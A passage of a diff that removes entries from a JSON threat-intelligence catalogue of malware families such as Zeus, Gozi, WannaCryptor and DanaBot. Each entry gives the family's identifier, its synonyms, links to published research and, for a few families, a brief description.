] - } - }, - { - "uuid": "0fba78fc-47a1-45e1-b5df-71bcabd23b5d", - "value": "Sisfader", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/june/cve-2017-8750-rtf-and-the-sisfader-rat/" - ] - } - }, - { - "uuid": "1cb63b32-cc65-4cdc-945a-e06a88cdd94b", - "value": "Cryptowall", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [] - } - }, - { - "uuid": "5c860744-bb12-4587-a852-ee060fd4dd64", - "value": "Plexor", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.symantec.com/connect/blogs/longhorn-tools-used-cyberespionage-group-linked-vault-7", - "https://securelist.com/blog/research/77990/unraveling-the-lamberts-toolkit/" - ] - } - }, - { - "uuid": "1d07212e-6292-40a4-a5e9-30aef83b6207", - "value": "SeaDaddy", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html", - "https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/" - ] - } - }, - { - "uuid": "973124e2-0d84-4be5-9c8e-3ff16bb43b42", - "value": "Zebrocy", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.welivesecurity.com/2018/04/24/sednit-update-analysis-zebrocy/", - "https://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/" - ] - } - }, - { - "uuid": "94b942e2-cc29-447b-97e2-e496cbf2aadf", - "value": "Graftor", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://blog.talosintelligence.com/2017/09/graftor-but-i-never-asked-for-this.html" - ] - } - }, - { - "uuid": "aae3b83d-a116-4ebc-aae0-f6327ef174ea", - "value": "MiKey", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://www.morphick.com/resources/lab-blog/mikey-linux-keylogger" - ] - } - }, - { - "uuid": "309d0745-bbfd-43bc-b2c4-511592a475bf", - "value": "DarkHotel", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://securelist.com/blog/research/71713/darkhotels-attacks-in-2015/", - "https://labs.bitdefender.com/wp-content/uploads/downloads/inexsmar-an-unusual-darkhotel-campaign/", - "http://blog.jpcert.or.jp/2016/06/asruex-malware-infecting-through-shortcut-files.html", - "https://blogs.technet.microsoft.com/mmpc/2016/06/09/reverse-engineering-dubnium-2/3/" - ] - } - }, - { - "uuid": "503ca41c-7788-477c-869b-ac530f20c490", - "value": "SendSafe", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [] - } - }, - { - "uuid": "c513c490-7c76-42ab-a51f-cc780faa7146", - "value": "Multigrain POS", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.pandasecurity.com/mediacenter/malware/multigrain-malware-pos/", - "https://www.fireeye.com/blog/threat-research/2016/04/multigrain_pointo.html" - ] - } - }, - { - "uuid": "1bf3469a-b9c8-497a-bcbb-b1095386706a", - "value": "rdasrv", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.wired.com/wp-content/uploads/2014/09/wp-pos-ram-scraper-malware.pdf" - ] - } - }, - { - "uuid": "512e0b13-a52b-45ef-9230-7172f5e976d4", - "value": "Rurktar", - "description": "", - "meta": { - "synonyms": [ - "RCSU" - ], - "type": [], - "refs": [ - "https://www.gdatasoftware.com/blog/2017/07/29896-rurktar-spyware-under-construction" - ] - } - }, - { - "uuid": "3304c5ce-85f0-4648-b95f-33cf9621cd2f", - "value": "Unidentified 048 (Lazarus?)", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://twitter.com/DrunkBinary/status/1002587521073721346" - ] - } - }, - { - "uuid": "e1fb348b-5e2b-4a26-95af-431065498ff5", - "value": "Nitol", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.trustwave.com/Resources/SpiderLabs-Blog/Tale-of-the-Two-Payloads-%E2%80%93-TrickBot-and-Nitol/" - ] - } - }, - { - "uuid": "4e8c1ab7-2841-4823-a5d1-39284fb0969a", - "value": "Zeus", - "description": "", - "meta": { - "synonyms": [ - "Zbot" - ], - "type": [], - "refs": [ - "https://zeustracker.abuse.ch/monitor.php", - "http://contagiodump.blogspot.com/2010/07/zeus-version-scheme-by-trojan-author.html", - "http://malwareint.blogspot.com/2010/02/facebook-phishing-campaign-proposed-by.html", - "http://malwareint.blogspot.com/2010/02/zeus-on-irs-scam-remains-actively.html", - "http://contagiodump.blogspot.com/2012/12/dec-2012-linuxchapro-trojan-apache.html", - "http://eternal-todo.com/blog/new-zeus-binary", - "http://contagiodump.blogspot.com/2010/07/zeus-trojan-research-links.html", - "https://www.symantec.com/connect/blogs/spyeye-s-kill-zeus-bark-worse-its-bite", - "https://nakedsecurity.sophos.com/2010/07/24/sample-run/", - "https://www.mnin.org/write/ZeusMalware.pdf", - "https://www.symantec.com/connect/blogs/brief-look-zeuszbot-20", - "http://malwareint.blogspot.com/2010/01/leveraging-zeus-to-send-spam-through.html", - "http://eternal-todo.com/blog/zeus-spreading-facebook", - "http://malwareint.blogspot.com/2010/03/new-phishing-campaign-against-facebook.html", - "http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/zeus_king_of_bots.pdf", - "http://eternal-todo.com/blog/detecting-zeus", - "https://www.secureworks.com/research/zeus?threat=zeus", - "http://malwareint.blogspot.com/2009/07/special-zeus-botnet-for-dummies.html" - ] - } - }, - { - "uuid": "467ee29c-317f-481a-a77c-69961eb88c4d", - "value": "Simda", - "description": "", - "meta": { - "synonyms": [ - "iBank" - ], - "type": [], - "refs": [ - "https://secrary.com/ReversingMalware/iBank/" - ] - } - }, - { - "uuid": "c9915d41-d1fb-45bc-997e-5cd9c573d8e7", - "value": "MacSpy", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.alienvault.com/blogs/labs-research/macspy-os-x-rat-as-a-service" - ] - } - }, - { - "uuid": "118ced99-5942-497f-885a-2b25d0569b4b", - "value": "Matrix Ransom", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [] - } - }, - { - "uuid": "6e668c0c-7085-4951-87d4-0334b6a5cdb3", - "value": "Shifu", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://researchcenter.paloaltonetworks.com/2017/01/unit42-2016-updates-shifu-banking-trojan/" - ] - } - }, - { - "uuid": "fe187c8a-25d4-4d30-bd43-efca18d527f0", - "value": "Slocker", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://blog.trendmicro.com/trendlabs-security-intelligence/slocker-mobile-ransomware-starts-mimicking-wannacry/" - ] - } - }, - { - "uuid": "4f7decd4-054b-4dd7-89cc-9bdb248f7c8a", - "value": "DanaBot", - "description": "Proofpoints describes DanaBot as the latest example of malware focused on persistence and stealing useful information that can later be monetized rather than demanding an immediate ransom from victims. The social engineering in the low-volume DanaBot campaigns we have observed so far has been well-crafted, again pointing to a renewed focus on “quality over quantity” in email-based threats. DanaBot’s modular nature enables it to download additional components, increasing the flexibility and robust stealing and remote monitoring capabilities of this banker. ", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://0ffset.wordpress.com/2018/06/05/post-0x08-analyzing-danabot-downloader/", - "https://www.proofpoint.com/us/threat-insight/post/danabot-new-banking-trojan-surfaces-down-under-0" - ] - } - }, - { - "uuid": "2c51a717-726b-4813-9fcc-1265694b128e", - "value": "Jaff", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://malware-traffic-analysis.net/2017/05/16/index.html", - "https://www.proofpoint.com/us/threat-insight/post/jaff-new-ransomware-from-actors-behind-distribution-of-dridex-locky-bart", - "http://blog.talosintelligence.com/2017/05/jaff-ransomware.html" - ] - } - }, - { - "uuid": "980ea9fa-d29d-4a44-bb87-0c050f8ddeaf", - "value": "CryLocker", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [] - } - }, - { - "uuid": "38cbdc29-a5af-46ae-ab82-baf3f6999826", - "value": "MazarBot", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://b0n1.blogspot.de/2017/08/phishing-attack-at-raiffeisen-bank-by.html", - "https://heimdalsecurity.com/blog/security-alert-mazar-bot-active-attacks-android-malware/" - ] - } - }, - { - "uuid": "aa553bbd-f6e4-4774-9ec5-4607aa2004b8", - "value": "Cobian RAT", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://securityaffairs.co/wordpress/62573/malware/cobian-rat-backdoor.html", - "https://www.zscaler.com/blogs/research/cobian-rat-backdoored-rat" - ] - } - }, - { - "uuid": "59717468-271e-4d15-859a-130681c17ddb", - "value": "Matrix Banker", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.arbornetworks.com/blog/asert/another-banker-enters-matrix/" - ] - } - }, - { - "uuid": "537f17ac-74e5-440b-8659-d4fdb4af41a6", - "value": "HeroRAT", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.welivesecurity.com/2018/06/18/new-telegram-abusing-android-rat/" - ] - } - }, - { - "uuid": "5c5beab9-614c-4c86-b369-086234ddb43c", - "value": "PowerWare", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://blog.cylance.com/ransomware-update-todays-bountiful-cornucopia-of-extortive-threats" - ] - } - }, - { - "uuid": "ed0b8ac9-973b-4aaa-9904-8c7ed2e73933", - "value": "FileIce", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.bleepingcomputer.com/news/security/in-dev-ransomware-forces-you-do-to-survey-before-unlocking-computer/" - ] - } - }, - { - "uuid": "44a1706e-f6dc-43ea-ac85-9a4f2407b9a3", - "value": "Ice IX", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://blog.trendmicro.com/trendlabs-security-intelligence/zeus-gets-another-update/", - "https://securelist.com/ice-ix-not-cool-at-all/29111/", - "https://www.virusbulletin.com/virusbulletin/2012/08/inside-ice-ix-bot-descendent-zeus" - ] - } - }, - { - "uuid": "d26b5518-8d7f-41a6-b539-231e4962853e", - "value": "Komplex", - "description": "", - "meta": { - "synonyms": [ - "JHUHUGIT", - "JKEYSKW", - "SedUploader" - ], - "type": [], - "refs": [ - "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html", - "https://objective-see.com/blog/blog_0x16.html", - "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part1.pdf", - "http://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/", - "https://blog.malwarebytes.com/threat-analysis/2016/09/komplex-mac-backdoor-answers-old-questions/" - ] - } - }, - { - "uuid": "75329c9e-a218-4299-87b2-8f667cd9e40c", - "value": "Gozi", - "description": "2000 Ursnif aka Snifula\r\n2006 Gozi v1.0, Gozi CRM, CRM, Papras\r\n2010 Gozi v2.0, Gozi ISFB, ISFB, Pandemyia(*)\r\n-> 2010 Gozi Prinimalka -> Vawtrak/Neverquest\r\n\r\nIn 2006, Gozi v1.0 ('Gozi CRM' aka 'CRM') aka Papras was first observed.\r\nIt was offered as a CaaS, known as 76Service. This first version of Gozi was developed by Nikita Kurmin, and he borrowed code from Ursnif aka Snifula, a spyware developed by Alexey Ivanov around 2000, and some other kits. Gozi v1.0 thus had a formgrabber module and often is classified as Ursnif aka Snifula.\r\n\r\nIn September 2010, the source code of a particular Gozi CRM dll version was leaked, which led to Vawtrak/Neverquest (in combination with Pony) via Gozi Prinimalka (a slightly modified Gozi v1.0) and Gozi v2.0 (aka 'Gozi ISFB' aka 'ISFB' aka Pandemyia). This version came with a webinject module.", - "meta": { - "synonyms": [ - "Ursnif", - "Snifula", - "Gozi CRM", - "Papras", - "CRM" - ], - "type": [], - "refs": [ - "http://blog.malwaremustdie.org/2013/02/the-infection-of-styx-exploit-kit.html", - "https://www.secureworks.com/research/gozi", - "https://lokalhost.pl/gozi_tree.txt", - "https://blog.gdatasoftware.com/2016/11/29325-analysis-ursnif-spying-on-your-data-since-2007", - "http://researchcenter.paloaltonetworks.com/2017/02/unit42-banking-trojans-ursnif-global-distribution-networks-identified/" - ] - } - }, - { - "uuid": "c4afb7c6-cfba-40d7-aa79-a2829828ed92", - "value": "Gameover DGA", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [] - } - }, - { - "uuid": "98bcb2b9-bc3a-4ffb-859a-94bd03c1cc3c", - "value": "Radamant", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.cyphort.com/radamant-ransomware-distributed-via-rig-ek/" - ] - } - }, - { - "uuid": "7f8166e2-c7f4-4b48-a07b-681b61a8f2c1", - "value": "Winnti", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://github.com/TKCERT/winnti-suricata-lua", - "http://blog.trendmicro.com/trendlabs-security-intelligence/winnti-abuses-github/", - "https://github.com/TKCERT/winnti-nmap-script", - "https://www.protectwise.com/blog/winnti-evolution-going-open-source.html", - "https://github.com/TKCERT/winnti-detector", - "http://blog.trendmicro.com/trendlabs-security-intelligence/pigs-malware-examining-possible-member-winnti-group/" - ] - } - }, - { - "uuid": "ef385825-bfa1-4e8c-b368-522db78cf1bd", - "value": "QRat", - "description": "QRat, also known as Quaverse RAT, was introduced in May 2015 as undetectable (because of multiple layers of obfuscation). It offers the usual functionality (password dumper, file browser, keylogger, screen shots/streaming, ...), and it comes as a SaaS. For additional historical context, please see jar.qarallax.", - "meta": { - "synonyms": [ - "Quaverse RAT" - ], - "type": [], - "refs": [ - "https://www.trustwave.com/Resources/SpiderLabs-Blog/Quaverse-RAT--Remote-Access-as-a-Service/", - "https://blogs.forcepoint.com/security-labs/look-qrypter-adwind%E2%80%99s-major-rival-cross-platform-maas-market", - "https://www.digitrustgroup.com/java-rat-qrat/" - ] - } - }, - { - "uuid": "7ea00126-add3-407e-b69d-d4aa1b3049d5", - "value": "Derusbi", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.virusbulletin.com/uploads/pdf/conference_slides/2015/Pun-etal-VB2015.pdf", - "http://www.novetta.com/wp-content/uploads/2014/11/Derusbi.pdf", - "https://www.threatconnect.com/the-anthem-hack-all-roads-lead-to-china/" - ] - } - }, - { - "uuid": "dcabea75-a433-4157-bb7a-be76de3026ac", - "value": "Careto", - "description": "", - "meta": { - "synonyms": [ - "Appetite", - "Mask" - ], - "type": [], - "refs": [ - "https://www.alienvault.com/blogs/labs-research/os-x-malware-samples-analyzed" - ] - } - }, - { - "uuid": "fa5fdfd2-8142-43f5-9b48-d1033b5398c8", - "value": "Triada", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.nowsecure.com/blog/2016/11/21/android-malware-analysis-radare-triada-trojan/", - "https://blog.checkpoint.com/2016/06/17/in-the-wild-mobile-malware-implements-new-features/", - "https://securelist.com/everyone-sees-not-what-they-want-to-see/74997/", - "https://securelist.com/attack-on-zygote-a-new-twist-in-the-evolution-of-mobile-threats/74032/", - "http://contagiominidump.blogspot.de/2016/07/android-triada-modular-trojan.html" - ] - } - }, - { - "uuid": "c4490972-3403-4043-9d61-899c0a440940", - "value": "EquationDrug", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://securelist.com/inside-the-equationdrug-espionage-platform/69203/", - "https://cdn.securelist.com/files/2015/02/Equation_group_questions_and_answers.pdf", - "https://securelist.com/equation-the-death-star-of-malware-galaxy/68750/", - "http://artemonsecurity.blogspot.com/2017/03/equationdrug-rootkit-analysis-mstcp32sys.html" - ] - } - }, - { - "uuid": "5ad30da2-2645-4893-acd9-3f8e0fbb5500", - "value": "elf.vpnfilter", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.justice.gov/opa/pr/justice-department-announces-actions-disrupt-advanced-persistent-threat-28-botnet-infected", - "https://blog.talosintelligence.com/2018/05/VPNFilter.html", - "https://blog.talosintelligence.com/2018/06/vpnfilter-update.html?m=1", - "https://www.symantec.com/blogs/threat-intelligence/vpnfilter-iot-malware", - "https://securelist.com/vpnfilter-exif-to-c2-mechanism-analysed/85721/" - ] - } - }, - { - "uuid": "262e0cf2-2fed-4d37-8d7a-0fd62c712840", - "value": "Penquin Turla", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://securelist.com/files/2017/04/Penquins_Moonlit_Maze_AppendixB.pdf", - "https://twitter.com/juanandres_gs/status/944741575837528064", - "https://securelist.com/files/2017/04/Penquins_Moonlit_Maze_PDF_eng.pdf" - ] - } - }, - { - "uuid": "3afecded-3461-45f9-8159-e8328e56a916", - "value": "IDKEY", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://isc.sans.edu/diary/22766" - ] - } - }, - { - "uuid": "8060dbdc-cf31-40bc-9900-eb8119423c50", - "value": "Catchamas", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets" - ] - } - }, - { - "uuid": "42ed9fc4-08ba-4c1c-bf15-d789ee4e3ca6", - "value": "BillGates", - "description": "BillGates is a modularized malware, of supposedly Chinese origin. Its main functionality is to perform DDoS attacks, with support for DNS amplification. Often, BillGates is delivered with one or many backdoor modules.\r\n\r\nBillGates is available for *nix-based systems as well as for Windows.\r\n\r\nOn Windows, the (Bill)Gates installer typically contains the various modules as linked resources.", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://securelist.com/versatile-ddos-trojan-for-linux/64361/", - "https://habrahabr.ru/post/213973/", - "https://www.akamai.com/kr/ko/multimedia/documents/state-of-the-internet/bill-gates-botnet-threat-advisory.pdf" - ] - } - }, - { - "uuid": "66781866-f064-467d-925d-5e5f290352f0", - "value": "Feodo", - "description": "", - "meta": { - "synonyms": [ - "Bugat", - "Cridex" - ], - "type": [], - "refs": [ - "http://contagiodump.blogspot.com/2012/08/cridex-analysis-using-volatility-by.html", - "https://securelist.com/analysis/publications/78531/dridex-a-history-of-evolution/", - "http://www.sempersecurus.org/2012/08/cridex-analysis-using-volatility.html" - ] - } - }, - { - "uuid": "120a5890-dc3e-42e8-950e-b5ff9a849d2a", - "value": "XSLCmd", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://objective-see.com/blog/blog_0x16.html" - ] - } - }, - { - "uuid": "df320366-7970-4af0-b1f4-9f9492dede53", - "value": "Mamba", - "description": "", - "meta": { - "synonyms": [ - "HDDCryptor", - "DiskCryptor" - ], - "type": [], - "refs": [ - "https://securelist.com/the-return-of-mamba-ransomware/79403/", - "http://blog.trendmicro.com/trendlabs-security-intelligence/bksod-by-ransomware-hddcryptor-uses-commercial-tools-to-encrypt-network-shares-and-lock-hdds/" - ] - } - }, - { - "uuid": "e6a077cb-42cc-4193-9006-9ceda8c0dff2", - "value": "Downdelph", - "description": "", - "meta": { - "synonyms": [ - "DELPHACY" - ], - "type": [], - "refs": [ - "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html", - "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part3.pdf" - ] - } - }, - { - "uuid": "4e3fa4e6-bc7d-4024-b191-ccafa5347c13", - "value": "AscentLoader", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [] - } - }, - { - "uuid": "771113e1-8550-4dc2-b2ad-7298ae381cb5", - "value": "Mutabaha", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://vms.drweb.ru/virus/?_is=1&i=8477920" - ] - } - }, - { - "uuid": "ed9f995b-1b41-4b83-a978-d956670fdfbe", - "value": "UrlZone", - "description": "", - "meta": { - "synonyms": [ - "Shiotob", - "Bebloh" - ], - "type": [], - "refs": [ - "https://www.gdatasoftware.com/blog/2013/12/23978-bebloh-a-well-known-banking-trojan-with-noteworthy-innovations", - "https://www.johannesbader.ch/2015/01/the-dga-of-shiotob/", - "https://www.virusbulletin.com/virusbulletin/2012/09/urlzone-reloaded-new-evolution/", - "https://www.fireeye.com/blog/threat-research/2016/01/urlzone_zones_inon.html", - "https://www.arbornetworks.com/blog/asert/an-update-on-the-urlzone-banker/", - "https://www.proofpoint.com/us/threat-insight/post/Vawtrak-UrlZone-Banking-Trojans-Target-Japan", - "https://krebsonsecurity.com/2011/07/trojan-tricks-victims-into-transfering-funds/" - ] - } - }, - { - "uuid": "ac2af862-34f4-4ced-9247-e3eeef1ad7d9", - "value": "WireLurker", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://objective-see.com/blog/blog_0x16.html", - "https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-wirelurker.pdf" - ] - } - }, - { - "uuid": "52acea22-7d88-433c-99e6-8fef1657e3ad", - "value": "Chrysaor", - "description": "", - "meta": { - "synonyms": [ - "JigglyPuff", - "Pegasus" - ], - "type": [], - "refs": [ - "https://info.lookout.com/rs/051-ESQ-475/images/lookout-pegasus-android-technical-analysis.pdf", - "https://android-developers.googleblog.com/2017/04/an-investigation-of-chrysaor-malware-on.html", - "https://media.ccc.de/v/33c3-7901-pegasus_internals", - "https://security.googleblog.com/2017/04/an-investigation-of-chrysaor-malware-on.html" - ] - } - }, - { - "uuid": "ba7706c1-7d2a-4031-9acc-cb862860da1a", - "value": "Cerbu", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [] - } - }, - { - "uuid": "ad67ff31-2a02-43f9-8b12-7df7e4fcccd6", - "value": "WannaCryptor", - "description": "", - "meta": { - "synonyms": [ - "Wana Decrypt0r", - "Wcry", - "WannaCry" - ], - "type": [], - "refs": [ - "https://blog.avast.com/ransomware-that-infected-telefonica-and-nhs-hospitals-is-spreading-aggressively-with-over-50000-attacks-so-far-today", - "https://baesystemsai.blogspot.de/2017/05/wanacrypt0r-ransomworm.html", - "http://www.independent.co.uk/news/uk/home-news/wannacry-malware-hack-nhs-report-cybercrime-north-korea-uk-ben-wallace-a8022491.html", - "https://gist.github.com/rain-1/989428fa5504f378b993ee6efbc0b168", - "https://blog.comae.io/wannacry-new-variants-detected-b8908fefea7e", - "https://blog.comae.io/wannacry-the-largest-ransom-ware-infection-in-history-f37da8e30a58", - "https://themoscowtimes.com/news/wcry-virus-reportedly-infects-russian-interior-ministrys-computer-network-57984", - "https://krebsonsecurity.com/2017/05/u-k-hospitals-hit-in-widespread-ransomware-attack/", - "https://securelist.com/blog/incidents/78351/wannacry-ransomware-used-in-widespread-attacks-all-over-the-world/", - "https://www.malwaretech.com/2017/05/how-to-accidentally-stop-a-global-cyber-attacks.html", - "https://www.symantec.com/connect/blogs/wannacry-ransomware-attacks-show-strong-links-lazarus-group", - "https://blog.gdatasoftware.com/2017/05/29751-wannacry-ransomware-campaign", - "https://blog.malwarebytes.com/cybercrime/2017/05/how-did-wannacry-ransomworm-spread/", - "https://www.flashpoint-intel.com/blog/linguistic-analysis-wannacry-ransomware/", - "http://blog.emsisoft.com/2017/05/12/wcry-ransomware-outbreak/", - "https://blog.comae.io/wannacry-decrypting-files-with-wanakiwi-demo-86bafb81112d" - ] - } - }, - { - "uuid": "b1cc4c79-30a5-485d-bd7f-8625c1cb5956", - "value": "Unidentified 013 (Korean)", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://blog.talosintelligence.com/2017/02/korean-maldoc.html" - ] - } - }, - { - "uuid": "7fd96553-4c78-43de-824f-82645ed4fac5", - "value": "Ordinypt", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.bleepingcomputer.com/news/security/ordinypt-ransomware-intentionally-destroys-files-currently-targeting-germany/", - "https://www.gdata.de/blog/2017/11/30151-ordinypt" - ] - } - }, - { - "uuid": "1d451231-8b27-4250-b3db-55c5c8ea99cb", - "value": "xxmm", - "description": "", - "meta": { - "synonyms": [ - "ShadowWalker" - ], - "type": [], - "refs": [ - "http://blog.trendmicro.com/trendlabs-security-intelligence/redbaldknight-bronze-butler-daserf-backdoor-now-using-steganography/", - "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses" - ] - } - }, - { - "uuid": "805b99d1-233d-4f7f-b343-440e5d507494", - "value": "Rambo", - "description": "", - "meta": { - "synonyms": [ - "brebsd" - ], - "type": [], - "refs": [ - "https://www.morphick.com/resources/news/deep-dive-dragonok-rambo-backdoor" - ] - } - }, - { - "uuid": "bf135b0a-3120-42c4-ba58-c80f9ef689bf", - "value": "Arefty", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://www.welivesecurity.com/2016/03/23/new-self-protecting-usb-trojan-able-to-avoid-detection/" - ] - } - }, - { - "uuid": "c4346ed0-1d74-4476-a78c-299bce0409bd", - "value": "FireCrypt", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.bleepingcomputer.com/news/security/firecrypt-ransomware-comes-with-a-ddos-component/" - ] - } - }, - { - "uuid": "f9b3757e-99c7-4999-8b79-87609407f895", - "value": "Kuluoz", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [] - } - }, - { - "uuid": "d2c111bf-ba0d-498a-8ca8-4cc508855872", - "value": "LockPOS", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.arbornetworks.com/blog/asert/lockpos-joins-flock/", - "https://www.cylance.com/en_us/blog/threat-spotlight-lockpos-point-of-sale-malware.html", - "https://www.cyberbit.com/new-lockpos-malware-injection-technique/" - ] - } - }, - { - "uuid": "22a686d8-dd35-4a29-9437-b0ce7b5c204b", - "value": "Unidentified 028", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [] - } - }, - { - "uuid": "21540126-d0bb-42ce-9b93-341fedb94cac", - "value": "Tsunami", - "description": "", - "meta": { - "synonyms": [ - "Radiation", - "Amnesia" - ], - "type": [], - "refs": [ - "http://researchcenter.paloaltonetworks.com/2017/04/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/", - "http://get.cyberx-labs.com/radiation-report", - "https://www.8ackprotect.com/blog/big_brother_is_attacking_you" - ] - } - }, - { - "uuid": "c8e8392f-883e-412e-9b0b-02137d0875da", - "value": "Nymaim2", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://johannesbader.ch/2018/04/the-new-domain-generation-algorithm-of-nymaim/" - ] - } - }, - { - "uuid": "f9aa9004-8811-4091-a471-38f81dbcadc4", - "value": "Nanocore RAT", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html", - "https://www.bleepingcomputer.com/news/security/nanocore-rat-author-gets-33-months-in-prison/" - ] - } - }, - { - "uuid": "1fb57e31-b97e-45c3-a922-a49ed6dd966d", - "value": "homefry", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html" - ] - } - }, - { - "uuid": "076a7ae0-f4b8-45c7-9de4-dc9cc7e54bcf", - "value": "Coldroot RAT", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://objective-see.com/blog/blog_0x2A.html" - ] - } - }, - { - "uuid": "8c95cb51-1044-4dcd-9cac-ad9f2e3b9070", - "value": "iSpy Keylogger", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.zscaler.com/blogs/research/ispy-keylogger" - ] - } - }, - { - "uuid": "48cb12ee-c60a-46cd-b376-39226027c616", - "value": "Mewsei", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [] - } - }, - { - "uuid": "5a03a6ff-e127-4cd2-aab1-75f1e3ecc187", - "value": "ATMSpitter", - "description": "The ATMSpitter family consists of command-line tools designed to control the cash dispenser of an ATM through function calls to either CSCWCNG.dll or MFSXFS.dll.\r\nBoth libraries are legitimate Windows drivers used to interact with the components of different ATM models.", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://quoscient.io/reports/QuoINT_INTBRI_New_ATMSpitter.pdf", - "https://quoscient.io/reports/QuoINT_INTBRI_ATMSpitter_v2.pdf" - ] - } - }, - { - "uuid": "bad1057c-4f92-4747-a0ec-31bcc062dab8", - "value": "Patcher", - "description": "", - "meta": { - "synonyms": [ - "Findzip" - ], - "type": [], - "refs": [ - "http://www.welivesecurity.com/2017/02/22/new-crypto-ransomware-hits-macos/" - ] - } - }, - { - "uuid": "64d40102-c296-4a85-9b9c-b3afb6d58e09", - "value": "Cueisfry", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://www.secureworks.com/blog/apt-campaign-leverages-the-cueisfry-trojan-and-microsoft-word-vulnerability-cve-2014-1761" - ] - } - }, - { - "uuid": "b614f291-dbf8-49ed-b110-b69ab6e8c6e5", - "value": "Unidentified 051", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://twitter.com/CDA/status/1014144988454772736" - ] - } - }, - { - "uuid": "04aeda9f-7923-45d1-ab74-9dddd8612d47", - "value": "Bundestrojaner", - "description": "", - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "http://www.stoned-vienna.com/analysis-of-german-bundestrojaner.html", - "http://www.ccc.de/system/uploads/76/original/staatstrojaner-report23.pdf" - ] - } - }, - { - "uuid": "9d0ddcb9-b0da-436a-af73-d9307609bd17", - "value": "GreenShaitan", - "description": "", - "meta": { - "synonyms": [ - "eoehttp" - ], - "type": [], - "refs": [ - "https://blog.cylance.com/spear-a-threat-actor-resurfaces" - ] - } - }, 